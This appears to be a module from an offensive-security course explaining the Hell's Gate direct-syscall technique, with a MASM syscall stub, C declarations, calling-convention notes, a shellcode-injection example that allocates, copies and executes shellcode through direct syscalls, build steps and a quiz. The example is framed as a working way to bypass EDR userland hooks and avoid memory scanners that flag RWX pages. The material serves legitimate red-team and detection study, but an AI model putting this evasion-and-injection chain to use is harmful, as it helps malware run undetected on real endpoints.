Module 6: Direct Syscall Execution
You have the number. Now invoke the gate.
Putting It All Together
In the previous module, we resolved SSNs from ntdll stubs. Now we use those SSNs to execute system calls directly, without ever calling through ntdll.dll. This module covers the Hell's Gate assembly stub, how the SSN is set dynamically at runtime, the calling convention bridge between C and the ASM stub, and a complete working example.
The Hell's Gate Assembly Stub
Hell's Gate uses a small assembly function that serves as a reusable syscall trampoline. The SSN is set before calling this stub, and the stub simply moves it into EAX and executes syscall:
; Hell's Gate ASM stub (hellsgate.asm - MASM syntax)
; This file defines two functions:
; HellsGate - stores the SSN for the next syscall
; HellDescent - executes the syscall with the stored SSN
.data
wSystemCall DWORD 0h ; Global variable to hold the current SSN
.code
; HellsGate: Set the SSN for the next syscall
; Param: WORD wSSN (arrives in CX, the low 16 bits of RCX; the stub stores all of ECX)
HellsGate PROC
mov wSystemCall, 000h ; Zero the SSN (clean state)
mov wSystemCall, ecx ; Store the SSN in the global variable
ret
HellsGate ENDP
; HellDescent: Execute the syscall
; Params: Same as the target Nt* function (passed in RCX, RDX, R8, R9, stack)
HellDescent PROC
mov r10, rcx ; Save 1st param (syscall clobbers RCX)
mov eax, wSystemCall ; Load the SSN from our global variable
syscall ; Ring 3 -> Ring 0
ret ; Return NTSTATUS in RAX
HellDescent ENDP
END
Two-Step Invocation
Hell's Gate uses a two-function pattern: first call HellsGate(ssn) to set the syscall number, then call HellDescent(params...) to execute the syscall. The SSN is stored in a global variable between the two calls. The alternative, passing the SSN as an extra leading parameter to a single function, would shift every real argument one slot to the right (the first Nt* argument would arrive in RDX instead of RCX), and the stub would have to move each argument back before executing syscall. The two-step approach keeps the parameter layout identical to the original Nt* function signature. The cost is shared state: every HellDescent call must be preceded by the matching HellsGate call.
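The ordering requirement can be seen in a portable mock that performs no real system call. This is only a sketch: mock_set_ssn and mock_descent are hypothetical stand-ins for HellsGate and HellDescent, g_ssn stands in for wSystemCall, and the numbers are arbitrary example values rather than real SSNs.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical stand-in for the wSystemCall global in hellsgate.asm. */
static uint32_t g_ssn = 0;

/* Mock of HellsGate: remember the number for the next call. */
void mock_set_ssn(uint16_t ssn)
{
    g_ssn = ssn;
}

/* Mock of HellDescent: no syscall is made. It only reports which
 * number would have been loaded into EAX. */
uint32_t mock_descent(void)
{
    return g_ssn;
}

/* Walk through the pattern with arbitrary example values. */
void demo_two_step(void)
{
    mock_set_ssn(0x18);
    assert(mock_descent() == 0x18);

    /* Skipping the set step silently reuses the previous number. */
    assert(mock_descent() == 0x18);

    mock_set_ssn(0x50);
    assert(mock_descent() == 0x50);
}
```

Because the stored number is a single global, it is also shared by every thread in the process. Two threads that interleave their set and descent calls could issue the wrong syscall, which is a limitation of this design rather than of the mock.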
C Function Declarations
To call the assembly functions from C, Hell's Gate declares them as external functions with the appropriate signatures:
// External declarations for the ASM stubs (from main.c)
extern VOID HellsGate(WORD wSystemCall);
extern NTSTATUS HellDescent(...);
// The HellDescent function uses varargs (...) because it serves as
// a generic syscall stub. The actual parameters depend on which
// Nt* function you're invoking.
// Usage pattern:
// 1. Call HellsGate(ssn) to set the SSN
// 2. Call HellDescent(param1, param2, ...) with the Nt* function's parameters
// 3. HellDescent returns the NTSTATUS result
The x64 Calling Convention
Understanding the x64 calling convention is essential for direct syscalls. The Windows x64 ABI passes the first four integer/pointer parameters in registers:
| Parameter | Register | After mov r10, rcx |
|---|---|---|
| 1st parameter | RCX | Moved to R10 (kernel reads from R10) |
| 2nd parameter | RDX | Stays in RDX |
| 3rd parameter | R8 | Stays in R8 |
| 4th parameter | R9 | Stays in R9 |
| 5th+ parameters | Stack | Remain on the stack |
When HellDescent is called from C, the compiler sets up registers and stack exactly as if calling the real Nt* function. The assembly stub then does mov r10, rcx (matching what ntdll does) and executes syscall. The kernel sees the same register layout it would see from a normal ntdll call.
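To make the layout concrete, here is a small portable sketch that prints where each argument lands at callee entry under the Windows x64 convention, next to where it would land if a hypothetical SSN parameter were placed first. The helper names arg_location and print_layout are illustrative and not part of Hell's Gate. The stack offsets assume the standard layout at function entry: the return address at [rsp], followed by 32 bytes of shadow space.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Write where the Windows x64 convention places the index-th (0-based)
 * integer or pointer argument, as seen at callee entry. */
void arg_location(size_t index, char *out, size_t out_len)
{
    static const char *regs[] = { "RCX", "RDX", "R8", "R9" };
    assert(out != NULL && out_len > 0);
    if (index < 4) {
        snprintf(out, out_len, "%s", regs[index]);
    } else {
        /* [rsp] holds the return address and the next 32 bytes are
         * shadow space, so the 5th argument sits at [rsp+0x28]. */
        snprintf(out, out_len, "[rsp+0x%zX]", 8 * (index + 1));
    }
}

/* Print each parameter's location for the two-step design and for a
 * hypothetical single function that takes the SSN as its first argument. */
void print_layout(const char *const *names, size_t param_count)
{
    char direct[32], shifted[32];
    assert(names != NULL || param_count == 0);
    printf("%-18s %-12s %s\n", "parameter", "two-step", "SSN-first");
    for (size_t i = 0; i < param_count; i++) {
        arg_location(i, direct, sizeof direct);
        arg_location(i + 1, shifted, sizeof shifted);
        printf("%-18s %-12s %s\n", names[i], direct, shifted);
    }
}
```

Calling print_layout with the six parameter names of NtAllocateVirtualMemory shows ProcessHandle in RCX for the two-step design but in RDX for the SSN-first variant, with the fourth parameter pushed out of R9 and onto the stack.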
Direct Syscall Execution Flow
HellsGate(ssn): store the SSN in the global variable
-> HellDescent(args): mov eax, SSN
-> syscall
-> NTSTATUS
Complete Working Example
Here is how Hell's Gate uses the resolved SSNs to perform a classic shellcode injection sequence. This demonstrates the entire chain from SSN resolution to syscall execution:
// From main.c - Shellcode execution using resolved syscalls
// (VX_TABLE 'Table' has been populated by GetVxTableEntry calls)
// Step 1: Allocate RW memory for shellcode
PVOID lpAddress = NULL;
SIZE_T sDataSize = sizeof(shellcode);
HellsGate(Table.NtAllocateVirtualMemory.wSystemCall);
NTSTATUS status = HellDescent(
(HANDLE)-1, // ProcessHandle: current process (NtCurrentProcess)
&lpAddress, // BaseAddress: let the system choose
0, // ZeroBits
&sDataSize, // RegionSize: size of shellcode
MEM_COMMIT | MEM_RESERVE, // AllocationType
PAGE_READWRITE // Protect: RW (not RWX -- safer)
);
// Step 2: Copy shellcode into allocated memory
// (The region allocated in Step 1 is RW, so a plain memcpy works)
memcpy(lpAddress, shellcode, sizeof(shellcode));
// Step 3: Change protection to RX (execute + read, no write)
DWORD dwOldProtect = 0;
HellsGate(Table.NtProtectVirtualMemory.wSystemCall);
status = HellDescent(
(HANDLE)-1, // ProcessHandle
&lpAddress, // BaseAddress
&sDataSize, // NumberOfBytesToProtect
PAGE_EXECUTE_READ, // NewAccessProtection: RX
&dwOldProtect // OldAccessProtection
);
// Step 4: Create a thread to execute the shellcode
HANDLE hThread = NULL;
HellsGate(Table.NtCreateThreadEx.wSystemCall);
status = HellDescent(
&hThread, // ThreadHandle (output)
THREAD_ALL_ACCESS, // DesiredAccess
NULL, // ObjectAttributes
(HANDLE)-1, // ProcessHandle: current process
lpAddress, // StartRoutine: shellcode address
NULL, // Argument
FALSE, // CreateFlags: not suspended
0, // ZeroBits
0, // StackSize
0, // MaximumStackSize
NULL // AttributeList
);
// Step 5: Wait for the thread to finish
HellsGate(Table.NtWaitForSingleObject.wSystemCall);
status = HellDescent(
hThread, // Handle
FALSE, // Alertable
NULL // Timeout (NULL = infinite)
);
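The listing above stores each result in status but never inspects it, so a failed allocation would go unnoticed until a later step used a NULL lpAddress. The following portable sketch shows the usual NTSTATUS check. The typedef and macros mirror the Windows definitions and are repeated here only so the snippet compiles without the Windows headers; status_severity and first_failure are hypothetical helper names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Portable stand-ins; on Windows these come from the SDK headers. */
typedef int32_t NTSTATUS;
#define NT_SUCCESS(status) (((NTSTATUS)(status)) >= 0)

#define STATUS_SUCCESS        ((NTSTATUS)0x00000000)
#define STATUS_TIMEOUT        ((NTSTATUS)0x00000102)
#define STATUS_ACCESS_DENIED  ((NTSTATUS)0xC0000022)

/* The top two bits of an NTSTATUS encode its severity. */
const char *status_severity(NTSTATUS status)
{
    static const char *names[] = {
        "success", "informational", "warning", "error"
    };
    return names[((uint32_t)status) >> 30];
}

/* Return the index of the first failing step, or count if every
 * step succeeded. */
size_t first_failure(const NTSTATUS *statuses, size_t count)
{
    assert(statuses != NULL || count == 0);
    for (size_t i = 0; i < count; i++) {
        if (!NT_SUCCESS(statuses[i])) {
            return i;
        }
    }
    return count;
}
```

Note that NT_SUCCESS treats STATUS_TIMEOUT as a success value, since only warning and error severities are negative. Code that waits with a finite timeout would need to compare against STATUS_TIMEOUT explicitly.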
What EDR Hooks Miss
In this execution flow, NtAllocateVirtualMemory, NtProtectVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject are never called through ntdll.dll, so an EDR's inline hooks on those functions never fire: execution never passes through the hooked code. The kernel still receives and processes the syscalls normally, which means kernel-side telemetry (for example, kernel callbacks and ETW providers) still observes the resulting allocation, protection change, and thread creation. Only the userland hooks are bypassed.
The W^X Strategy
Notice the two-step memory permission approach in the example above: first allocate as RW (writable, for copying shellcode), then change to RX (executable, for running it). This is called W^X (Write XOR Execute) and avoids the RWX red flag that memory scanners look for. At no point is the memory simultaneously writable and executable.
| Step | Permission | Purpose |
|---|---|---|
| Allocate | PAGE_READWRITE (RW) | Allows writing shellcode into the buffer |
| Copy | RW | memcpy shellcode bytes |
| Protect | PAGE_EXECUTE_READ (RX) | Makes code executable, removes write |
| Execute | RX | Thread starts executing shellcode |
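The property in the table can be stated as a check: no protection value in the sequence may be writable and executable at once. The sketch below is a portable illustration of that check, similar in spirit to what a memory scanner looks for. The constants carry the values defined in winnt.h and are repeated only so the snippet compiles anywhere; the function names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Page protection values as defined in winnt.h. */
#define PAGE_READONLY           0x02u
#define PAGE_READWRITE          0x04u
#define PAGE_WRITECOPY          0x08u
#define PAGE_EXECUTE            0x10u
#define PAGE_EXECUTE_READ       0x20u
#define PAGE_EXECUTE_READWRITE  0x40u
#define PAGE_EXECUTE_WRITECOPY  0x80u

/* True if the protection allows writes. */
bool is_writable(uint32_t prot)
{
    return (prot & (PAGE_READWRITE | PAGE_WRITECOPY |
                    PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)) != 0;
}

/* True if the protection allows instruction fetches. */
bool is_executable(uint32_t prot)
{
    return (prot & (PAGE_EXECUTE | PAGE_EXECUTE_READ |
                    PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)) != 0;
}

/* True if no state in the sequence is writable and executable together. */
bool sequence_obeys_wx(const uint32_t *prots, size_t count)
{
    assert(prots != NULL || count == 0);
    for (size_t i = 0; i < count; i++) {
        if (is_writable(prots[i]) && is_executable(prots[i])) {
            return false;
        }
    }
    return true;
}
```

The RW then RX sequence from the table passes this check, while a single PAGE_EXECUTE_READWRITE allocation fails it.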
Compiling and Linking
The Hell's Gate project requires compiling the C code, assembling the MASM file, and linking the results together. The assembly file (hellsgate.asm) is assembled with the 64-bit Microsoft Macro Assembler (ml64.exe), and the resulting object file is linked with the C object files:
// Build process (Visual Studio / MSVC):
// 1. hellsgate.asm -> ml64.exe /c hellsgate.asm -> hellsgate.obj
// 2. main.c -> cl.exe /c main.c -> main.obj
// 3. Link: -> link.exe main.obj hellsgate.obj -> hellsgate.exe
// In Visual Studio:
// - Add hellsgate.asm to project
// - Right-click -> Properties -> Item Type: "Microsoft Macro Assembler"
// - Build as x64 Release (ASM uses x64-only instructions)
Why Inline Assembly Does Not Work
MSVC does not support inline assembly (__asm) in x64 builds. This is why Hell's Gate uses a separate .asm file with MASM syntax. Some projects use compiler intrinsics or embed raw bytes, but a separate ASM file is the cleanest approach and allows proper debugging.
Pop Quiz: Direct Syscall Execution
Q1: Why does Hell's Gate use two separate functions (HellsGate + HellDescent) instead of one?
Q2: In the HellDescent assembly stub, what does mov r10, rcx do?
Q3: Why does the example allocate memory as PAGE_READWRITE first, then change to PAGE_EXECUTE_READ?